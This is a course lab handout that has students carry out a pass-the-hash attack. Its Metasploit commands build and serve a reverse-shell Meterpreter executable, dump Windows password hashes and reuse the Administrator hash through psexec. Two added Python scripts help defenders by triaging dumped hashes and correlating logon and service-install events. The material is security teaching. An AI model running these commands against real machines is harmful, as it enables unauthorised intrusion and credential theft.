Proj 14x: Pass The Hash (10 pts. extra credit)

What You Need for this Project

Purpose

To practice the Pass the Hash attack in a non-domain environment.

Task 1: Getting Hashes

Exploiting the Target with a Malicious Download

First we'll get the password hashes from the target, using malware. Launch your Kali machine.

In Kali, execute these commands to create a malicious Windows executable file named "mal.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 LPORT=4445 -f exe > /var/www/html/mal.exe
service apache2 start

In Kali, execute these commands to start a C&C listener.

msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.1.188
set LPORT 4445
exploit

On your Windows target, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:

http://172.16.1.188/mal.exe

Download mal.exe and run it.

On your Kali machine, a Meterpreter session opens, as shown below.

Execute these commands to start interacting with the Meterpreter shell and dump the hashes:

sessions -i 1
hashdump

Notice the highlighted text in the image above. This is the Administrator password hash, which we will use later.
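The hashdump line you just highlighted is in pwdump format, user:RID:LMHASH:NTHASH:::, and a defender reading such output wants to know more than which hash to copy. The following Python script is an added example, not part of this lab and not Metasploit code. It parses that format and reports the things worth noticing: the well-known "empty" LM value (aad3b435b51404eeaad3b435b51404ee, meaning LM hashing is off or the password exceeds 14 characters), the NT hash of a blank password (31d6cfe0d16ae931b73c59d7e0c089c0), the built-in Administrator (RID 500), and accounts that share an NT hash, which is exactly the password reuse that lets a hash from one machine work on another. The sample dump is constructed; only the Administrator line reuses the hash shown in this project.

```python
"""Triage of Meterpreter-style hashdump output (added example, not lab code).

Parses lines in the pwdump format that hashdump prints,
    user:RID:LMHASH:NTHASH:::
and reports what a defender should notice.  The sample below is constructed;
only the Administrator line reuses the hash shown in the lab.
"""
import re
from typing import Dict, List

# LM hash of an empty/absent password.  Seeing it means LM hashing is disabled
# (NoLMHash) or the password is longer than 14 characters, which is good.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password (MD4 of zero bytes): the account has no password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
ADMIN_RID = 500  # well-known RID of the built-in Administrator account

# user : rid : 32-hex LM : 32-hex NT : : :
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump (banner line included to show that non-hash lines are skipped).
SAMPLE = """\
[*] Dumping password hashes (constructed sample, not a real dump)...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
backupadmin:1002:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""


def parse_hashdump(text: str) -> List[Dict[str, object]]:
    """Parse pwdump-format lines; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records


def triage(records: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Return per-user findings; users with nothing to report are omitted."""
    findings: Dict[str, List[str]] = {}
    for r in records:
        notes = []
        if r["rid"] == ADMIN_RID:
            notes.append("built-in Administrator (RID 500): its hash works wherever this password is reused")
        if r["lm"] != EMPTY_LM:
            notes.append("LM hash stored: legacy LM hashing is enabled and trivially crackable")
        if r["nt"] == EMPTY_NT:
            notes.append("blank password")
        if notes:
            findings[str(r["user"])] = notes
    return findings


def shared_nt_hashes(records: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group users whose NT hashes are identical, i.e. who share a password."""
    groups: Dict[str, List[str]] = {}
    for r in records:
        groups.setdefault(str(r["nt"]), []).append(str(r["user"]))
    return {h: users for h, users in groups.items() if len(users) > 1}


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE)
    for user, notes in triage(recs).items():
        print(f"{user}: {'; '.join(notes)}")
    for h, users in shared_nt_hashes(recs).items():
        print(f"shared NT hash {h}: {', '.join(users)}")
```

The shared-hash check is the one that matters most for the next task: if the local Administrator password is the same on several machines, every one of them accepts that hash. Unique local admin passwords per machine (for example via LAPS) and denying network logon to local accounts are the standard mitigations for that reuse.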

Execute this command to close the Meterpreter session.

exit

Task 2: Passing the Hash

Suppose you are attacking a company and you trick one user into running malware, so you get some hashes from that machine.

The hashes might work on other machines at the same company. In our case we'll attack the same target, but in a real pentest you'd be attacking a different machine.

Using Metasploit's Psexec Module

On Kali, in Metasploit, execute these commands:

use windows/smb/psexec
show options

As shown below, there are options for a username and password.

The amazing thing about the pass-the-hash attack is that the password hashes work fine without cracking them.

In Metasploit, execute these commands, replacing the IP address with the IP address of your target system:

set RHOST 172.16.1.197
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
exploit

A Meterpreter session opens, as shown below.
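On the target, this logon is not invisible. The psexec technique authenticates over SMB with NTLM, which the Security log records as event 4624 with Logon Type 3 (network) and authentication package NTLM, and then installs a service to run its payload, which the System log records as event 7045. The following Python script is an added example, not part of this lab, showing the correlation a defender would run over those two event types. The event records are constructed and only model the fields of the real events; the service name is a made-up random-looking value, since psexec-style tools typically install a service with an arbitrary name.

```python
"""Correlating the Windows events left by a psexec-style pass-the-hash logon
(added example, not part of the lab).

Rule: a privileged NTLM network logon (Security 4624, LogonType 3, package
NTLM) followed within a short window by a service installation (System 7045)
on the same host.  The EVENTS list is constructed and only models the field
names of the real events.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed event records for one host, in chronological order.
EVENTS: List[Dict[str, object]] = [
    {"time": "2017-09-22T10:00:01", "id": 4624, "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "alice", "IpAddress": "-"},
    # NTLM network logon as the local Administrator from the attacker's address in this lab
    {"time": "2017-09-22T10:05:10", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
     "TargetUserName": "Administrator", "IpAddress": "172.16.1.188"},
    # Service with an arbitrary name installed two seconds later (constructed name and path)
    {"time": "2017-09-22T10:05:12", "id": 7045, "ServiceName": "XkQpLzRw",
     "ImagePath": r"%SystemRoot%\XkQpLzRw.exe", "ServiceType": "user mode service"},
    # Unrelated, benign service install an hour later (constructed)
    {"time": "2017-09-22T11:00:00", "id": 7045, "ServiceName": "ExampleUpdater",
     "ImagePath": r"C:\Program Files\Example\updater.exe", "ServiceType": "user mode service"},
]

PRIVILEGED_USERS = {"Administrator"}   # extend with your local admin group members
WINDOW = timedelta(seconds=60)         # max gap between logon and service install


def ts(event: Dict[str, object]) -> datetime:
    return datetime.fromisoformat(str(event["time"]))


def ntlm_network_logons(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """4624 events that are NTLM network logons for a privileged account."""
    return [
        e for e in events
        if e["id"] == 4624
        and e.get("LogonType") == 3
        and e.get("AuthenticationPackageName") == "NTLM"
        and e.get("TargetUserName") in PRIVILEGED_USERS
    ]


def correlate(events: List[Dict[str, object]], window: timedelta = WINDOW) -> List[Dict[str, object]]:
    """Pair each 7045 service install with any qualifying logon in the preceding window."""
    alerts = []
    logons = ntlm_network_logons(events)
    for svc in (e for e in events if e["id"] == 7045):
        t_svc = ts(svc)
        for lg in logons:
            gap = (t_svc - ts(lg)).total_seconds()
            if 0 <= gap <= window.total_seconds():
                alerts.append({
                    "source": lg["IpAddress"],
                    "user": lg["TargetUserName"],
                    "service": svc["ServiceName"],
                    "image": svc["ImagePath"],
                    "gap_seconds": gap,
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"ALERT: {a['user']} logged on via NTLM from {a['source']}, "
              f"service {a['service']} ({a['image']}) installed {a['gap_seconds']:.0f}s later")
```

Event 7045 carries no source address, so the pairing is by time only; in a busy environment add the 5140/5145 share-access events for ADMIN$ from the same IpAddress to tighten it. In a non-domain environment like this lab every remote admin logon is an NTLM network logon, so the service installation is the stronger of the two signals.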

Saving the Screen Image

Make sure you can see these two required items, as shown above:

Save a FULL DESKTOP image with the filename Proj 14x from Your Name.

Turning in Your Project

Send the image as an email attachment to cnit.124m@gmail.com with a Subject line of Proj 14x from Your Name.



Posted 9-22-17 by Sam Bowne
Revised 9-25-17